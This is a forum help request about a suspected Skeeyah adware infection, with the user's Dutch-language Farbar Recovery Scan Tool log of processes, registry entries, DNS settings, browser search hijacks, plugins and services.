Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Skeeyah malware [Solved]

Started by Tommie , Jan 31 2016 09:05 AM

This topic is locked

#1
Tommie

Posted 31 January 2016 - 09:05 AM

Member

Member
39 posts

Hi guys!

It seems I am infected with the Skeeyah Malware. At least that's what MS Security Essentials detected. I read on the internet that it's not easy to get rid of so I need your help. My Chrome browser is badly effected, each hyperlink sends me to some add's. Even AddBlocker doesn't stop it. On top of that I get a regular error message about a RunDLL32 has stopped working (see attachment, I couldn't add it inline)

Thanks so much for helping!

FRST:

Scanresultaten van Farbar Recovery Scan Tool (FRST) (x64) Versie:27-01-2016
Gestart door Thomas (Beheerder) op THOMASHP (31-01-2016 15:53:22)
Gestart vanaf C:\Users\Thomas\Desktop
Geladen Profielen: Thomas (Beschikbare Profielen: Thomas & Farah)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Taal: Nederlands (Nederland)
Internet Explorer Versie 11 (Standaardbrowser: Chrome)
Boot Modus: Normal
Handleiding voor Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processen (gefilterd) =================

(Als een item is opgenomen in de fixlist, het proces zal worden gesloten. Het bestand zal niet worden verplaatst.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\stacsv64.exe
(Hewlett-Packard) C:\Windows\System32\hpservice.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Borland Software Corporation) C:\Program Files (x86)\Borland\InterBase\bin\ibguard.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
() C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Borland Software Corporation) C:\Program Files (x86)\Borland\InterBase\bin\ibserver.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\Digital Imaging\bin\HpqSRmon.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Enigma Software Group USA, LLC.) C:\Users\Thomas\AppData\Local\Temp\esg_uninstall.exe~
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\msconfig.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

==================== Register (gefilterd) ===========================

(Als een item is opgenomen in de fixlist, het registry item zal worden teruggezet naar de standaardwaarden of verwijderd. Het bestand zal niet worden verplaatst.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1332296 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [487424 2010-03-23] (IDT, Inc.)
HKLM-x32\...\Run: [hpqSRMon] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe [150528 2008-07-22] (Hewlett-Packard)
HKLM-x32\...\Run: [Magic Desktop for HP notification] => C:\ProgramData\Easybits Magic Desktop for HP\mdhpSUN.exe [1444880 2015-12-19] (Easybits)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [24952376 2015-12-22] (Dropbox, Inc.)
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\Policies\Explorer: [NoDriveTypeAutoRun] 0x91000000
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: I - I:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {2b8d0e3f-bd57-11e2-ab5a-0027139cb244} - I:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {3ae780a1-cc27-11e0-a7cd-806e6f6e6963} - H:\Autorun.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {4b2c0f65-a7fc-11df-8008-c80aa93d6b46} - H:\pushinst.exe
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\MountPoints2: {8e3ba2a0-b16c-11e0-9213-0027139cb244} - "K:\WD SmartWare.exe" autoplay=true
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {904FB7E2-AD8B-45AF-B3A2-D309F7514790} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.28.dll [2015-12-22] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {904FB7E2-AD8B-45AF-B3A2-D309F7514790} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Restrictie <======= AANDACHT

==================== Internet (gefilterd) ====================

(Als een item is opgenomen in de fixlist, als het een registry item is wordt verwijderd of hersteld naar de standaard.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{4CE7C2CE-6870-4554-B040-95B53DC877D2}: [DhcpNameServer] 62.179.104.196 213.46.228.196
Tcpip\..\Interfaces\{87A2D826-64D9-404E-81A5-1EF1506A015E}: [DhcpNameServer] 192.168.44.1
Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{BDFA63EE-A48F-4A09-AAA4-100407F87C51}: [DhcpNameServer] 62.179.104.196 213.46.228.196

Internet Explorer:
==================
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.searchcompletion.com/?si=16615&home=true
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.uk.msn.com/HPCON/8
SearchScopes: HKLM -> DefaultScope {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> DefaultScope {C40A74EF-1690-4E7D-BA23-2D2A8D06B733} URL = hxxp://www.google.co.uk/search?hl=en&q={searchTerms}&meta=
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://search.searchcompletion.com/?si=16615&chrome=true&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {97E4E265-3974-49CA-BCB6-B6CFEAA7BDE0} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {C40A74EF-1690-4E7D-BA23-2D2A8D06B733} URL = hxxp://www.google.co.uk/search?hl=en&q={searchTerms}&meta=
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Geen Naam -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Geen bestand
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-09-22] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-06-07] (Oracle Corporation)
BHO-x32: Aanmeldhulp voor Microsoft-account -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-06-07] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> Geen Naam - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - Geen bestand
DPF: HKLM-x32 {C345E174-3E87-4F41-A01C-B066A90A49B4} hxxp://trial.trymicrosoftoffice.com/trialoaa/buymsoffice_assets/framework/microsoft/wrc32.ocx
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)

FireFox:
========
FF ProfilePath: C:\Users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default
FF Homepage: hxxps://alliances.commandandconquer.com/login/auth?utm_medium=referral&utm_source=www.google.nl&utm_campaign=cca_g-s-holland-cca
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_134.dll [2015-03-22] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [Geen bestand]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_134.dll [2015-03-22] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2009-07-21] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-06-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-06-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Geen bestand]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Geen bestand]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-19] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1460008453-1702061876-2463211388-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Thomas\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll [2014-07-24] (Skype Limited)
FF Plugin HKU\S-1-5-21-1460008453-1702061876-2463211388-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Thomas\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-01-10] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1460008453-1702061876-2463211388-1000: LWAPlugin15.8 -> C:\Users\Thomas\AppData\Roaming\Mozilla\Plugins\npLWAPlugin15.8.dll [2013-03-13] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2014-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Thomas\AppData\Roaming\mozilla\plugins\np-mswmp.dll [2009-09-25] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Thomas\AppData\Roaming\mozilla\plugins\npLWAPlugin15.8.dll [2013-03-13] (Microsoft Corporation)
FF Extension: Logitech Device Detection - C:\Users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default\extensions\[email protected] [2011-08-20] [ niet getekend]
FF Extension: Adblock Plus - C:\Users\Thomas\AppData\Roaming\Mozilla\Firefox\Profiles\wvk3h4r8.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-31]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR Profile: C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Presentaties) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-10]
CHR Extension: (Google Documenten) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-10]
CHR Extension: (Google Drive) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-30]
CHR Extension: (YouTube) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-30]
CHR Extension: (Adblock Plus) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-01-30]
CHR Extension: (Google Search) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-30]
CHR Extension: (PanicButton) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\faminaibgiklngmfpfbhmokfmnglamcm [2012-07-11]
CHR Extension: (Google Spreadsheets) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-10]
CHR Extension: (Offline Documenten) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-30]
CHR Extension: (Betalingen via Chrome Web Store) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-30]
CHR Extension: (Gmail) - C:\Users\Thomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-01]

==================== Services (gefilterd) ========================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe [89600 2009-03-03] (Andrea Electronics Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-01-30] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-01-30] (Dropbox, Inc.)
S2 ezSharedSvc; C:\Windows\SysWOW64\ezsvc7.dll [129584 2009-02-22] (EasyBits Sofware AS) [Bestand niet getekend]
R2 fa6789c5; c:\Program Files (x86)\VideoCnv\Zet.dll [3752448 2014-10-30] () [Bestand niet getekend]
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [249344 2009-09-20] (Hewlett-Packard Co.) [Bestand niet getekend]
S2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-09-20] (Hewlett-Packard Co.) [Bestand niet getekend]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1037824 2009-09-20] (Hewlett-Packard Co.) [Bestand niet getekend]
R2 InterBaseGuardian; C:\Program Files (x86)\Borland\InterBase\bin\ibguard.exe [32768 2002-10-30] (Borland Software Corporation) [Bestand niet getekend]
R3 InterBaseServer; C:\Program Files (x86)\Borland\InterBase\bin\ibserver.exe [1880064 2002-10-30] (Borland Software Corporation) [Bestand niet getekend]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-08-20] (Hewlett-Packard Company) [Bestand niet getekend]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2015-01-30] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [58387104 2014-07-12] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Bestand niet getekend]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366512 2015-01-30] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [Bestand niet getekend]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Bestand niet getekend]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75064 2010-08-17] ()
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [441504 2014-07-12] (Microsoft Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\STacSV64.exe [247808 2010-03-23] (IDT, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (gefilterd) ==========================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

S3 avmeject; C:\Windows\System32\drivers\avmeject.sys [14120 2009-03-20] (AVM Berlin)
R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
